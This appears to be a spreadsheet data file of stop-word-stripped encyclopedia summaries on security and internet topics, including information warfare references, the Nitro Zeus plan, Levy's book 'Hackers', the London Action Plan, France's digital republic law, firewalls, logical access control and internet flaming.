similar traditional war, seek limit impact civilians. also group specific: specific: notes references bibliography books jerome clayton glenn, "future mind" chapter defense p.195-201. acropolis books ltd, washington, (1989) winn schwartau, "information warfare: chaos electronic superhighway" thunder's mouth press (1993) winn schwartau, information warfare: cyberterrorism: protecting personal security electronic age, thunder's mouth press, (1996) (isbn 1560251328). john arquilla david ronfeldt, athena's camp, rand (1997). dorothy denning, information warfare security, addison-wesley (1998) (isbn 0201433036). james adams, next world war: computers weapons front line everywhere, simon schuster (1998) (isbn 0684834529). edward waltz, information warfare principles operations, artech house, 1998, isbn 0-89006-511-x john arquilla david ronfeldt, networks netwars: future terror, crime, militancy, rand (2001) (isbn 0833030302). ishmael jones, human factor: inside cia's dysfunctional intelligence culture, encounter books, york (2010) (isbn 978-1594032233). information/intelligence warfare. gregory rattray, strategic warfare cyberspace, press (2001) (isbn 0262182092). anthony cordesman, cyber-threats, information warfare, critical infrastructure protection: defending homeland (2002) (isbn 0275974235). leigh armistead, information operations: hard reality soft power, joint forces staff college national security agency (2004) (isbn 1574886991). thomas rid, media operations: military press vietnam iraq, routledge (2007) (isbn 0415416590). other science war: information warfare, history channel (1998). further reading resources politically motivated computer crime cyberspace information operations study center archived 2007-10-31 wayback machine, university, u.s. force. information warfare site information warfare monitor tracking cyberpower (university toronto, canada/munk centre) twitter: infowarmonitor information warfare, i-war, c4i, cyberwar federation american scientists resources archived 2007-10-14 wayback machine association crows http://www.crows.org electronic warfare information operations association. c4i.org computer security intelligence information warfare, information operations electronic attack capabilities power australia. committee policy consequences legal/ethical implications offensive information warfare archived 2017-06-11 wayback machine, national academies. program information warfare, global information society project, world policy institute. information warriors information warriors forum dedicated discussion navy information warfare. mastermind corporation information warfare tactics analysis information warfare biology nature's exploitation information survival contests, monash university, computer science. course syllabi cosc information warfare: terrorism, crime, national security department computer science, georgetown university (1997–2002) (dorothy denning). cse468 information conflict (honours) school computer science software engineering, monash university (2006) (carlo kopp). information warfare, cyberterrorism, hacktivism cybercrime, cyberterrorism digital enforcement, york school. papers: research theory andrew borden, usaf (ret.), what information warfare? aerospace power chronicles (1999). carlo kopp, fundamental paradigm infowar (february 2000). research theory links, cyberspace information operations study center, college, university, u.s. force. lachlan brumley al., cutting through tangled web: information-theoretic perspective information warfare (october 2012). galeotti, mark march 2018). "i'm sorry creating 'gerasimov doctrine'". foreign policy. slate group. retrieved march 2022. galeotti, mark (2018). "the mythical 'gerasimov doctrine' language threat". critical studies security. informa limited. (2): 157–161. doi:10.1080/21624887.2018.1441623. issn 2162-4887. oclc 8319522816. s2cid 159811828. michael macdonald (2012) "black logos: rhetoric information warfare", pages 189–220 literature, rhetoric values: selected proceedings conference held university waterloo, june 2011, editors shelley hulan, murray mcarthur randy allen harris, cambridge scholars publishing isbn 978-1-4438-4175-7 taddeo, mariarosaria (2012). information warfare: philosophical perspective. philosophy technology (1):105-120. inna, vasilyeva. "the value interaction russia, china facing information warfare." ijcwt (2013): 1–9. [1]. papers: other essay information operations zachary hubbard news articles army, force seek offensive cyber war, govexec.com (june 2007). nato says urgent need tackle cyber attack, reuters (june 2007). america prepares 'cyber war' china, telegraph.uk.co (june 2007). nato, gear cyberpunk warfare, register (june 2007). united states department defense doctrine information operations roadmap (dod 2003) information operations 3-13 2006) operations security 3-13.3) military deception 3-13.4) joint doctrine psyop 3-53 2003) joint doctrine public affairs 3-61 2005) destabilizing terrorist networks: disrupting manipulating information flows global terrorism, yale information society project conference paper (2005). seeking symmetry fourth generation warfare: information operations ideas, presentation (pdf slides) bantle institute national security counterterrorism (insct) symposium, syracuse university (2006). taipale, seeking symmetry information front: confronting global jihad internet, national strategy rev. (summer 2007). external links</t>
  </si>
  <si>
    <t>Nitro Zeus</t>
  </si>
  <si>
    <t>nitro zeus project name well funded comprehensive cyber attack plan created mitigation strategy stuxnet malware campaign aftermath. unlike stuxnet, loaded onto system design phase affect proper operation, nitro zeus's objectives built system design phase unbeknownst system users. this built-in feature allows assured effective cyber attack system's users.the information existence raised research interviews carried alex gibney zero days documentary film. proposed long term widespread infiltration major iranian systems would disrupt degrade communications, power grid, vital systems desired cyber attackers. this achieved electronic implants iranian computer networks. project seen pathway alternatives full-scale war. also kill switch backdoor (computing) operation olympic games references</t>
  </si>
  <si>
    <t>Hackerspace Global Grid</t>
  </si>
  <si>
    <t>hackerspace global grid aiming building establishing distributed sensor communication network. started 2011 armin bauer (shackspace), andreas horning (constellation platform), gregor jehle (shackspace) call participation hackers space programme chaos communication camp, 2011 create global community-driven communication network.the long-term technical goal establish system tracking communicating amateur satellites near earth orbit, system kept open variety sensors, i.e. earthquake detection, radiation weather data. currently, project state possible receive data commercial aeroplanes ads-b.a stated misinterpreted project produce communication system, 'free internet censorship'. also deep space network hacklab references external links official website</t>
  </si>
  <si>
    <t>Hackers: Heroes of the Computer Revolution</t>
  </si>
  <si>
    <t>hackers: heroes computer revolution (isbn 0-385-19195-2) book steven levy hacker culture. published 1984 garden city, york nerraw manijaime/doubleday. levy describes people, machines, events defined hacker culture hacker ethic, early mainframe hackers mit, self-made hardware hackers game hackers. book edition afterword (entitled "afterword: years after") author 1994. 2010, 25th anniversary edition updated material published o'reilly. levy's description hacker ethics principles first foremost levy's principles concept hacker ethic popularization popular culture. levy's words, principles dictate: access computers—and anything might teach something world works—should unlimited total. always yield hands-on imperative! information free. mistrust authority—promote decentralization. hackers judged hacking, bogus criteria degrees, age, race position. create beauty computer. computers change life better.the hacker ethic deals idea individuals performing duty common good, analogy modern "robin hood". hacker communities result prided fact rebellion authority figures restrict level computer freedom. hackers judged ability opposed various systems places currently dictate authority, schools universities. mostly hacker ethic idealizes notion hacking art-form, something revered opposed disputed frowned upon. popularized "phreakers" 1970s 1980s, something evident, also widespread among growing community. manuel castells, another lecturer involved field computing, something reflects community, also wider social, political financial world. sense, hacking something affect everyone, whether interpretation given hackers steven levy compared negative stereotypes media dictate perception. preface levy decided write subject hackers thought fascinating people. also wanted present accurate view hackers people had. levy found "adventurers, visionaries, risk-takers, [and] artists" rather "nerdy social outcasts 'unprofessional' programmers wrote dirty, 'nonstandard' computer code." book, levy talked many different hackers active 1950s 1980s. who's beginning, levy introduces many important hacker figures machines. among are: john draper (also known captain crunch), infamous phone phreaker; bill gates, harvard dropout “cocky wizard” wrote altair basic; richard greenblatt, “hacker's hacker”; steve jobs, visionary; stephen “woz” wozniak, "openhearted, technologically daring hardware hacker"; marvin minsky, “playful brilliant" professor headed lab; richard stallman, "the last true hackers"; many others. among machines mentioned atari 800, altair 8800, apple pdp-1, tx-0, others. part one: true hackers tech model railroad club (tmrc) club built sophisticated railroad train models. members among first hackers. figures club peter samson, alan kotok, jack dennis, saunders. club composed groups, interested modeling landscaping, comprised signals power subcommittee created circuits enable trains run. latter would among ones popularized term hacker among many slang terms, eventually moved computers computer programming. they initially drawn 704, multimillion-dollar mainframe operated building access time mainframe reserved important people. group really began involved computers jack dennis, former member, introduced tx-0, three-million-dollar computer long-term-loan lincoln laboratory. they would usually stake place tx-0 housed late night hopes someone signed computer time absent. hacker ethic concepts, beliefs, morals came symbiotic relationship hackers machines. something written manifesto, commonly, silently, agreed upon creed simply came ethic basically consisted allowing information free (open accessible) order learn world worked; using already available knowledge create knowledge. anything prevented getting knowledge resented. best system open could debugged improved upon anyone. them, bureaucracy bane open systems culture time epitome. worth hacker judged looking hacking, criteria education, age, race, position, anything hacker created computer could considered artistic beautiful like anything else. beautiful computer code aesthetic, innovative, efficient memory space. practice optimizing program code known “bumming.” another belief computers enhance life, even hacker. time computers well understood hackers convince others, including professors, belief. spacewar!: many hackers also fascinated telephone companies exchange systems would often tours companies offered learn much possible. alan kotok, acquired prestige skills tx-0 also worked western electric (the manufacturing bell system), would read much could technical details telephone system explore fingerprint network. september 1961, donated mit's second pdp-1 produced. machine dream hackers. them, including kotok, samson, saunders, wagner, spent total hundred fifty man-hours weekend rewrite tx-0 compiler pdp-1 like first choice. they paid five hundred dollars feat, finished product come hacker ethic, reward. steve “slug” russell another pdp-1 hacker came game called spacewar! space ships, controlled toggle switches pdp-1, would around screen shoot torpedoes other. program improved hackers. samson, example, changed random dots represented stars look like real constellations made screen scroll ships moved space. edwards, another programmer, added effect gravitational pull. kotok saunders even created first computer joystick tmrc parts playing. game compiler readily freely available anyone. eventually programs started make computers usable person time, concept called time-sharing. started jack dennis pdp-1, started professor fernando corbató 7090. would eventually paid three million dollars year arpa develop time-sharing project headed robert fano involvement corbató, dennis, minsky would focus artificial intelligence. project housed ninth floor tech square, would become home many hackers. greenblatt gosper: ricky greenblatt born hacker, although asked whether hacker born made, said, hackers born, they're going made, they're made born.” intelligent child, used play chess make electrical devices early age. when first intent making dean's list, sophomore year flunked out, spending much time hacking relay circuits tmrc programming pdp-1. even programmed fortran compiler pdp-1. bill gosper math genius. took programming course john mccarthy, minsky's course artificial intelligence. hackers enjoyed chinese food, would order anything seemed interesting exploratory minds. most much social life outside hacking, greenblatt notorious lack personal hygiene. gosper managed graduate, work back tuition money navy paid him. gosper like navy culture allow programmers near computers, hated univac computer used since considered erroneous design. managed work private company later project mac. greenblatt decided write better chess program found kotok's version lacking strategy. program good enough defeat renowned academic hubert dreyfus proclaimed chess program would good enough beat ten-year-old (and, correctly, artificial intelligence programme doomed failure profound theoretical fallacies). although hackers proved skeptic wrong, hacker ethic concluded convincing outside world merits computers interesting hacking them. midnight computer wiring society created stew nelson, hacker really interested phone networks computer programming. created mcws wanted instruction pdp-1 computer, administrators forbidden anyone “not qualified” messing computer hardware. just like many hackers, believed hacker ethic, would tools make modifications believed would improve system. hackers would find unlock door safe simply believe bureaucracy closed systems. nelson also wired pdp-1 automatically dial route telephone calls blue box. time, also believed hacking done profit. winners losers classifications hackers whereby former, grad students latter capable hacking feats could understand "the right thing". hackers initially time-sharing systems felt system used fullest, could done person time. time-sharing systems time slow imposed many restrictions users. greenblatt convinced fredkin time-sharing systems could beneficial, out, along nelson, write time-sharing system called its, incompatible time-sharing system, initially pdp-6, later pdp-10. this system would allow many users many programs once. allowed users full access files system, require passwords. continued improved greenblatt hackers open fashion. life: outside ninth floor tech square, life different. point late 1960s many students protesting war, everything involved war. funded department defense, also target protests. many hackers also anti-war, feel direct effect war. when protesters took protest ninth floor itself, security tightened locks added. this hacker ethic, felt done order protect equipment. hacker life also target criticism. many felt hackers obsessed even addicted computers, hardly social interactions real world. hackers lack sleep, malnutrition, pressure finishing hack, entire lifestyle much. hacker even drugs, later attempted suicide. one. chapter, levy explores hacker lifestyle, effect hackers. hacker culture though spreading outside computers became common. center hacker culture stanford's (sail) started john mccarthy. sail atmosphere laid back. whereas mit's developed spacewar!, sail developed adventure game. sail even sauna, “willing young coeds” participated orgy captured video camera transmitted computer terminals hackers watch. stanford hackers could eccentric however, also lived hacker ethic. hacker lived parked outside sail building, whereas others would sometimes sleep crawl space roof artificial ceiling. some hackers moved stanford, whereas others stayed mit. hacker ethic spread even creation arpanet (the precursor internet) connected several computer systems different parts country network. life computer simulation written john horton conway, became focus gosper 1970. this resulted arguments greenblatt, fascinated life, think gosper others monopolizing machine simulation. gosper fascinated life uncharted territory posed question could called real life. funding started arpa congress passed mansfield amendment. could hire hacker showed talent anymore. instead, started looking professors teach computer courses. gosper left stanford would study donald knuth, still hacking pdp-10 tech square arpanet. generation hackers coming along would spread gospel computers making smaller affordable. part two: hardware hackers revolt 2100: felsenstein founders community memory, offshoot resource based berkeley, california wanted establish communication system people contact other. they made computer terminal connected xds-940 mainframe. joined jude milhon, another hacker free speech activist wary project military involvement, forming community memory. albrecht computer-book publishing company dymax also brought computing people teaching young students program. formed people's computer company, storefront menlo park, california, offer computer time classes ordinary people. spun series books tabloid newspaper. actually crazy much advanced throughout 19th 20th century. every god: while felsenstein marsh trying build swift terminal, company albuquerque, mexico called mits roberts came article popular electronics computer cost $397. altair 8800, based intel 8080 microprocessor, bytes memory, struck chord many hackers mits went close bankruptcy millions dollars worth orders, unable fulfill orders time. although computer general public, altair brought dream closer. homebrew computer club founded fred moore gordon french electronics hobbyists hackers together exchange information talk projects. first meeting took place march 1975 gordon's garage silicon valley. there people first meeting, among felsenstein, marsh, albrecht, steve dompier, marty spergel, allen baum stephen wozniak. dompier wrote program able play simple musical melodies altair could heard radio electrical interference. some participants thought making boards 8800, even formed small companies sell boards. membership club grew hundreds, members sharing equipment knowledge continuation hacker ethic developed mit. many products introduced critiqued club meetings, schematics source code would freely shared improved. tiny basic: altair basic interpreter translated instructions basic programming language assembly instructions altair 8800 could understand. developed bill gates paul allen, founders microsoft, styled "micro-soft", specifically 8800 would memory. unlike previous hackers hacker ethic, micro-soft mits felt people basic like paid add-on card. many hackers fact orders basic, still wait order shipped. during show mits, someone hold copied paper tape containing altair basic. tapes duplicated passed around freely commercial product even shipped customers. gates allen appreciate turn events since actually paid commission copy basic mits sold. gates responded writing open letter titled “open letter hobbyists” considered sharing software theft. tiny basic similar interpreter would memory supported subset functionality micro-soft basic (which subset dartmouth basic). developed dick whipple john arnold tyler, texas distributed freely magazine. many people sent improvements programs developed tiny basic published. this eventually creation dobb's journal edited warren distributed free inexpensive software response gates' claims theft. pittman someone else take kindly gates' words. wrote version tiny basic motorola 6800 microprocessor. although sold $3,500, retained rights sell others decided charge received many orders even money people already gotten copy simply wanted efforts. pittman also wrote essay “deus machina” hardware hackers tied together. felsenstein marsh banded together create fully contained computer issue popular electronics called sold thousand dollars. woz: steve wozniak hardware hacker since high school. went first homebrew meeting happy found people similar interests hardware computers. working hewlett-packard time built computer based technology 6502 microprocessor, computer later became known apple able build machine fewer chips thinking solutions problems ways never done before. wozniak friends steve jobs, worked atari interested computer wozniak built, thinking make sell machines profit. wozniak first approached employer idea, rejected believing computer marketable. wozniak accepted jobs' offer named company apple, selling computer $666.66 example. their software diagrams available others free minimal cost. jobs wozniak soon followed first computer apple would spark revolution computer industry. they built company garages jobs taking care managing company wozniak hacked hardware. homebrew club, machine hailed some, others felt machine adequate since used “standard” parts software. secrets: west coast computer faire, organized warren reiling 1977, amongst first signs industry take would take computers houses ordinary people. machines like commodore radio shack trs-80 came market sold numbers. hacker ethic fell wayside companies started keep hardware software specifications secret competition. homebrew members started dwindle many hackers either formed companies become employed could divulge knew anymore. others busy even attend meetings. signaled shift hacker culture. part three: game hackers wizard princess: roberta williams founders sierra on-line, first computer gaming companies, among generation hackers. learned programming work different companies mainframes. roberta hooked computers showed adventure game written woods. interested game roberta immersed couple parents small children time. ken's younger brother bought apple soon afterwards bought well. decided write fortran compiler hired five programmers help meanwhile roberta devised game based adventure called mystery house. scrapped compiler project instead wrote code game. they talked programma, biggest distributor apple software, offered royalty, could netted $9,000. instead decided wanted profits sold game independently. they started making tens thousands dollars month games, still working company making $42,000 year. quit moved woods oakhurst, california live dream life. their second game, wizard princess made even money beginning genre commercial software, games. brotherhood: computers began bought people wish program them, rather bought software computer stores. games item came software. among game companies time on-line, brøderbund (the brotherhood), sirius software. some companies formed sort brotherhood communicating cooperating other. third generation consisted hackers much access computers former hardware hackers. personal computers becoming popular point high school kids could afford them. among generation john harris, atari assembly hacker, later produced games on-line. summer camp nickname on-line's headquarters. staff partied whenever working. atmosphere casual free-spirited, could last company growing. frogger: john harris decided port arcade classic atari computer on-line systems. spent time energy perfecting game, disks stolen even finished game trade show. devastated also lost entire software library. relationship williams suffered john unable return programming months. eventually remade frogger game success on-line, atmosphere changed. longer believed business could along hackers ethic, instead become professional. realized needed professional management handle on-line grown beyond control. decided dick sunderland, former boss told management potential,” on-line's president. however, could remove company matters. although knew non-hacker company, could away excitement. applefest: third generation interested hacker ethic, instead sales figures started matter more, many software companies started using copy protection mechanisms prevent software used without permission. hackers mechanisms another form locks picked order liberate software (see also software cracking). mark duchaineau hacker came protection scheme called "spiradisk" [sic] apple computer. this scheme actually made software loading process faster loading data spirals instead concentric circles. started working on-line, actually wanted conventional protection schemes. mark basically held on-line hostage insisting implementing copy protection release, ultima spiradisk scheme rather conventional ones. game could released without copy protection fear unauthorized copying. 1982, francisco applefest among last important applefests, signaled shift company attitudes. from days brotherhood, new, business oriented, competitive atmosphere. wizard wizards televised contest devised tatum held vegas, game authors would compete playing other's games. epilogue: last true hackers richard stallman, also known initials, called levy "last true hackers". this mean "last real hacker", rather last faithful member class hackers levy called "true hackers". stallman getting physics degree harvard time hacking mit's tech square building lab. people cooperating instead competing, like computers restricted user access computers passwords. advocated choosing empty password anyone could computers. also developed text editor emacs shared condition modify source code also share modifications. while fighting keep hacker ethic going computers mit, richard greenblatt hackers came lisp machine sought form company sell them. greenblatt unwilling yield business pressures wanted form company would maintain hacker ethic. many others disagreed result competing companies. lisp machine incorporated, lmi, headed greenblatt, symbolics headed russ noftsker. symbolics hired hackers, schism created groups hackers, point would even talk other. stallman whole hacker culture existing hackers left companies hackers fill shoes. held symbolics responsible lab's death, help competitor response. subsequently launched development operating system, based unix design following principles free software. reception magazine stated levy "does capture essential composite hacker personality fails accept true hacker, driven machine lust, equally content hack corporate corridors. also naively optimistic collective spirit computing, believes ultimately prevail". there later criticisms levy's book point failure acknowledge hacker world excluded women minorities, consciously cultural bias early participants. references external links read chapters project gutenberg.</t>
  </si>
  <si>
    <t>London Action Plan</t>
  </si>
  <si>
    <t>london action plan scheme endorse worldwide spam enforcement cooperation address unnecessary email-related problems, online fraud deception, phishing, distribution internet viruses. members also start action plan contribution interested administration community agencies, proper personal sector council, develop network entities engaged spam enforcement cooperation. background october 2004, government communal agencies nations accountable implementing rules relation spam london talk global spam enforcement assistance. gathering, wide range spam enforcement organizations, plus data guard agencies, telecommunications groups shopper protection companies, convened chat international spam enforcement cooperation. numerous private sector representatives also acted team fractions gathering. references london action plan international consumer protection enforcement network</t>
  </si>
  <si>
    <t>Loi pour une République numérique</t>
  </si>
  <si>
    <t>pour république numérique (abr. numérique) french first proposed axelle lemaire, secretary state digital affairs, voted 07/10/2016.this enables government fulfill two-fold purpose give france head start digital field promoting open data knowledge policy" "adopt progressive digital approach, based individuals, strengthen power rights digital world". organized around three lines: circulation data knowledge, protection individuals digital society access digital all. discussion began online public consultation, october 2015, then, enriched proposals internet users, debated voted national assembly january 2016. follows "digital ambition" consultation benoit thieulin yann bonnet, part work national digital council.it's major law. supersedes pour confiance dans l'économie numérique (confidence digital economy act) 2004. themes bill voted meps first reading introduces particular default opening public data, neutrality, obligation loyalty online platforms, well increased protection personal data internet users. digital republic also provides conditions internet accessible greatest number, acceleration coverage territory high bandwidth mobile telecommunications, measures better access people disabilities online services, creation right continuation internet connection case unpaid bills households difficulty. accessibility measures promote accessibility people disabilities public service sites planned. however, recommended, obligation inform site accessible not, criticized association "les aveugles france", collective "pour france accessible" association "faire face". open data data portability included project default release public data, recommendation interoperable formats. free software open formats article provides encouragement free software open formats public administration information systems, order preserve control, durability independence. addition, specifies source codes administrative documents communicated reused, article law. implementing decree issued specify list licenses, open source, applicable distribution source codes. list source codes published etalab. copyright issues definition digital commons discussed, great interest online consultation, withdrawn matignon. cabinet fleur pellerin, minister culture, isabelle attard condemned matignon's withdrawal commons, submitted amendment favour commons, rejected.freedom panorama also debated, potential commercial images likely problem. compromise amendment accepted, satisfy demands favour freedom panorama, particular allows strictly non-commercial use, difficult define internet. open access promotes open access scientific publications cost. research publications funded least public funds made available free charge embargo period: article makes self-archiving possible authors months publication publicly funded).this right authors non-waivable, contractual provision contrary superseded, even articles published 2016, meant encourage green open access irrespective academic publishers' policies. digital access proposal also adopted guarantee right internet all, even limited, allowing access electronic mail online public services. network operators encouraged develop investments needs greatest, prolongation extension scope over-damping deployment fibre rural areas. sovereign operating system amendment favour sovereign also adopted, provoked rather negative reactions, notably anssi, possible lack realism proposal already existing solutions, secure operating system clip, based linux. privacy cnil's power would strengthened, event recurrence, reach turnover million euros. amendments favour right forgotten minors closure online accounts deceased persons also approved. group actions companies respect privacy also planned. digital death article incorporates concept digital death define becomes person's digital data upon death. principles data protection provided data protection, files freedoms become obsolete. gives possibility defining directives relating conservation, erasure communication personal data death, failing which, legal heirs digital data. digital trade issues january 2016, national assembly amended bill amendment 376, adding article making anyone renting property platform airbnb without written permission owner liable imprisonment, heavy fines even eviction home. amendment defended member sandrine mazetierr.in addition, senate proposes income earned online sales platforms would automatically declared authorities. video game competitions january 2016, prime minister manuel valls entrusted mps, rudy salles jérôme durain, task "defining legislative regulatory framework promote development video game competitions france" french secretary state digital affairs innovation, axelle lemaire. report submitted march 2016 parliamentarians participation bill digital republic, chapter section recognizes practice video games competition france, well official status professional players. reactions critics online consultation this bill first preceded online consultation: initial consultation organised conseil national numérique identified certain subjects included (portability, open data..) second consultation organised government text bill. project deemed insufficient group national assembly criticised coherent unfortunately inadequate package", group expressed concern digital divide. environmentalists left front regretted withdrawal information commons. also marco civil internet, brazilian digital voted 2014 libre accès neutralité réseau biens communs numériques relative liberté communication informatique confiance sécurité l'information notes references external links, official documents dossier législatif sénat dossier législatif l'assemblée nationale</t>
  </si>
  <si>
    <t>Firewalls and Internet Security</t>
  </si>
  <si>
    <t>firewalls internet security: repelling wily hacker 1994 book william cheswick steven bellovin helped define concept network firewall. describing detail first major firewall deployments at&amp;t, book influenced formation perimeter security model, became dominant network security architecture mid-1990s.in 2003, second edition published, adding aviel rubin authors. references external links page second edition firewalls internet security google books</t>
  </si>
  <si>
    <t>LoginRadius</t>
  </si>
  <si>
    <t>loginradius inc. cloud-based saas consumer identity access management platform based francisco, california, usa. established 2012. company ranked overall leader kuppingercole analyst firm kuppingercole report leadership compass, 2020. history loginradius started 2012 friends deepak gupta rakesh soni social login widget. interview, soni said started company recognizing hassles registration websites negative effects conversion rates. products july 2020, loginradius launched latest identity import manager feature, allows large-scale imports loginradius database user profile data credentials another system using files. data easily imported different programs, facilities, repositories. platform according company, loginradius platform pre-built integrations different customer relationship management, platform, email marketing tools. platform involved collection customer data traditional email based registration social profile data. acquired customer data secured cloud based storage. loginradius also provides single customer view customer data aggregated record. organizations using loginradius platform integrate marketing tools. references external links official website loginhubs complete login database social login</t>
  </si>
  <si>
    <t>Logical access control</t>
  </si>
  <si>
    <t>computers, logical access controls tools protocols used identification, authentication, authorization, accountability computer information systems. logical access often needed remote access hardware often contrasted term "physical access", refers interactions (such lock key) hardware physical environment, equipment stored used. logical access controls enforce access control measures systems, programs, processes, information. controls embedded within operating systems, applications, add-on security packages, database telecommunication management systems. line logical access physical access blurred physical access controlled software. example, entry room controlled chip card electronic lock controlled software. only possession appropriate card, appropriate security level knowledge permitted entry room. swiping card card reader entering correct code. logical controls, also called logical access controls technical controls, protect data systems, networks, environments protect them. order authenticate, authorize, maintain accountability variety methodologies used password protocols, devices coupled protocols software, encryption, firewalls, systems detect intruders maintain security, reduce vulnerabilities protect data systems threats. businesses, organizations entities wide spectrum logical access controls protect hardware unauthorized remote access. these include sophisticated password programs, advanced biometric security features, setups effectively identify screen users administrative level. particular logical access controls used given facility hardware infrastructure partially depend nature entity owns administrates hardware setup. government logical access security often different business logical access security, federal agencies specific guidelines controlling logical access. users required hold security clearances screening procedures complement secure password biometric functions. this part protecting data kept specific hardware setup. militaries governments logical access biometrics protect large powerful networks systems require high levels security. essential large networks police forces militaries used gain access also main essential applications. without logical access control security systems highly confidential information would risk exposure. there wide range biometric security devices software available different levels security needs. there large complex biometric systems large networks require absolute airtight security less expensive systems office buildings smaller institutions. notes references andress, jason. (2011). ″the basics information security.″ cory janssen, logical access, techopedia, retrieved 3:15 a.m. august 2014 findbiometrics, logical access control biometrics, retrieved 3:25 a.m. august 2014 external links intelligence driven security, corporation</t>
  </si>
  <si>
    <t>Flaming (Internet)</t>
  </si>
  <si>
    <t>flaming roasting posting insults, often including profanity offensive language, internet. this term confused term trolling, someone going online, person, causing discord. flaming emerged anonymity internet forums provide cover users aggressively. anonymity lead disinhibition, results swearing, offensive, hostile language characteristic flaming. lack social cues, less accountability face-to-face communications, textual mediation deindividualization also likely factors. deliberate flaming carried individuals known flamers, specifically motivated incite flaming. these users specialize flaming target specific aspects controversial conversation. while behaviors typical expected certain types forums, dramatic, adverse effects others. flame wars lasting impact internet communities even flame concluded division even dissolution occur.the pleasant commentaries within chat room message board limited "war words" fight "flaming" intent seek negative reaction reader. humphreys defines flaming "the hostile language online, including swearing, insults otherwise offensive language". flaming perpetrators within online community commonly received messaging text rarely face face video communication. basing conversations text taking full accountability "flamer", reduced self-awareness others feelings, emotions reactions based comments provide within virtual community. reader perception "flamer" difficult, rude possibly bully. flamer limited social cues, emotional intelligence adapt others reactions lack awareness perceived. their personal social norms, considered disrespectful reader different social norms, education experience appropriate within virtual communities. individuals create environment flaming hostility, lead readers disengage offender potentially leave message board chat room. continual flaming within online community create disruptive negative experience involved lead limited involvement engagement within original chat room program. purpose social researchers investigated flaming, coming several different theories phenomenon. these include deindividuation reduced awareness people's feelings (online disinhibition effect), conformance perceived norms, miscommunication caused lack social cues available face-to-face communication, anti-normative behavior. jacob borders, discussing participants' internal modeling discussion, says:mental models fuzzy, incomplete, imprecisely stated. furthermore, within single individual, mental models change time, even flow single conversation. human mind assembles relationships context discussion. debate shifts, mental models. even single topic discussed, participant conversation employs different mental model interpret subject. fundamental assumptions differ never brought open. goals different left unstated. little wonder compromise takes long. even consensus reached, underlying assumptions fallacies lead laws programs fail. human mind adapted understanding correctly consequences implied mental model. mental model correct structure assumptions but, even human mind—either individually group consensus—is draw wrong implications future.thus, online conversations often involve variety assumptions motives unique individual user. without social context, users often helpless know intentions counterparts. addition problems conflicting mental models often present online discussions, inherent lack face-to-face communication online encourage hostility. professor norman johnson, commenting propensity internet posters flame another, states:the literature suggests that, compared face-to-face, increased incidence flaming using computer-mediated communication reductions transfer social cues, decrease individuals' concern social evaluation fear social sanctions reprisals. when social identity ingroup status salient, computer mediation decrease flaming individuals focus attention social context (and associated norms) rather themselves.a lack social context creates element anonymity, allows users feel insulated forms punishment might receive conventional setting. johnson identifies several precursors flaming users, refers "negotiation partners," since internet communication typically involves back-and-forth interactions similar negotiation. flaming incidents usually arise response perception negotiation partners unfair. perceived unfairness include lack consideration individual's vested interests, unfavorable treatment (especially flamer considerate users), misunderstandings aggravated inability convey subtle indicators like non-verbal cues facial expressions. factors there multiple factors play people would involved flaming. instance, anonymity factor people different means identity hidden. through hiding one's identity people build persona normally would identity known. another factor flaming proactive aggression "which initiated without perceived threat provocation" recipients flaming counter flaming utilize reactive aggression. another factor goes flaming different communication variables. instance, offline communications networks impact people online lead engage flaming. finally, factor verbal aggression people engage verbal aggression tactics engage flaming online.flaming range subtle extremely aggressive online behaviors, derogatory images, certain emojis used combination, even capital letters. these things show pattern behavior used convey certain emotions online. victims best avoid fighting back attempt prevent words. flaming extends past social media interactions. flaming also take place emails, matter much whether someone calls email "flame", based whether considers email hostile, aggressive, insulting, offensive. what matters person receives interaction. much lost translation communicating online versus person, hard distinguish someone's intent. history evidence debates resulted insults exchanged quickly back forth parties found throughout history. arguments ratification united states constitution often socially emotionally heated intense, many attacking another local newspapers. such interactions always part literary criticism. example, ralph waldo emerson's contempt jane austen's works often extended author herself, emerson describing "without genius, wit, knowledge world". turn, thomas carlyle called emerson "hoary-headed toothless baboon"in modern era, "flaming" used east coast engineering schools united states present participle crude expression describe irascible individual extension individuals earliest internet chat rooms message boards. internet flaming mostly observed usenet newsgroups although known occur wwivnet fidonet computer networks well. subsequently used parts speech much meaning. term "flaming" seen usenet newsgroups eighties, start flame sometimes indicated typing "flame on", "flame off" flame section post complete. this reference human torch fantastic four, used words activating flame abilities, text processing programs time worked, placing commands text indicate appear printed. term "flaming" documented hacker's dictionary, 1983 defined speak rabidly incessantly uninteresting topic patently ridiculous attitude". meaning word diverged definition since then. jerry pournelle 1986 explained wanted kill file bix: whereas open computer conference begins small number well-informed highly interested participants, soon attracts others. that's right; supposed attract others. where else would ideas? soon attracts many, many, ignorant aggressively misinformed. dilution takes place. arguments replace discussions. tempers frayed. result computer conferencing began saving time, starts time saved more. communications come dozens sources. much redundant. some stupid. user spends time dealing irrelevancies. user wakes decides initial euphoria spurious, logs off, never return. this known burnout, apparently quite common. added, noticed something: irritation came handful people, sometimes two. could ignore them, computer conferences still valuable. alas, always easy do".computer-mediated communication (cmc) research spent significant amount time effort describing predicting engagement uncivil, aggressive online communication. specifically, literature described aggressive, insulting behavior "flaming", defined hostile verbal behaviors, uninhibited expression hostility, insults, ridicule, hostile comments directed towards person organization within context cmc. types flame trolling flame trolling posting provocative offensive message, known flamebait, public internet discussion group, forum, newsgroup mailing list, intent provoking angry response "flame") argument. flamebait provide poster controlled trigger-and-response setting anonymously engage conflicts indulge aggressive behavior without facing consequences behavior might bring face-to-face encounter. instances, flamebait used reduce forum's angering forum users. 2012, announced state department would start flame trolling jihadists part operation viral peace.among characteristics inflammatory behavior, entirely capitalized messages, multiple repetition exclamation marks, along profanity identified typical. flame flame results multiple users engage provocative responses original post, sometimes flamebait. flame wars often draw many users, including trying defuse flame war, quickly turn mass flame overshadows regular forum discussion. resolving flame difficult, often hard determine really responsible degradation reasonable discussion flame war. someone posts contrary opinion strongly focused discussion forum easily labeled "baiter", "flamer", "troll". flame wars become intense include "death threats, hominem invective, textual amplifiers,” sociologists flame wars actually bring people together. what said flame taken seriously since harsh words part flaming.an approach resolving flame responding flaming communicate openly offending users. acknowledging mistakes, offering help resolve disagreement, making clear, reasoned arguments, even self-deprecation noted worthwhile strategies disputes. however, others prefer simply ignore flaming, noting that, many cases, flamebait receives attention, quickly forgotten forum discussions carry unfortunately, motivate trolls intensify activities, creating additional distractions. "taking bait" "feeding troll" refers someone responds original message regardless whether aware original message intended provoke response. often someone takes bait, others point acronym "yhbt", short "you trolled", reply "don't feed trolls". forum users usually give troll acknowledgement; "feeds troll". sociology, history, kind online ethnographic academic study, flame wars corpus, approach controversies, used understand stake community. idea flame drives actors abandoning polite stance forces engage debate unveil otherwise concealed 